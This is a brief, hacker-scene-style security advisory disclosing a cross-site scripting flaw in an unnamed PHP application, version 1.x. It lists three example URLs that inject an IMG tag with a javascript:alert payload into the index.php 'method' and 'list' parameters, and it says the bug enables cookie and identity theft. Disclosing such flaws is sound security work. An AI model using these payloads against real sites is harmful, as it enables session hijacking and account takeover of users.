###########################################################################
#Info:
##################################################################
#this bug consists of inserting script in the line of execution of
#the affected system causing the robbery of cookie and like consequence
#the identity robbery of the affected user or administrator
#Example XSS:
##################################################################
#http://www.example.com/[dirpath]/index.php?method=showhtmllist&list=<IMG SRC=`javascript:alert("0o_zeus_o0, 'XSS'")`>
#http://www.example.com/[dirpath]/index.php?method=<IMG SRC=`javascript:alert("0o_zeus_o0, 'XSS'")`>
#http://www.example.com/[dirpath]/index.php?method=login_form&list=<IMG SRC=`javascript:alert("0o_zeus_o0, 'XSS'")`>
##################################################################
#Solution:
##################################################################
#VULNERABLE VERSIONS
##################################################################
#1.x Other versions may also be affected.
##################################################################
#Contact information
#0o_zeus_o0
#[email protected]
#www.elitemexico.org
##################################################################
#greetz: lady fire,Mi beba, olimpus klan team and elitemexico
##############################################################################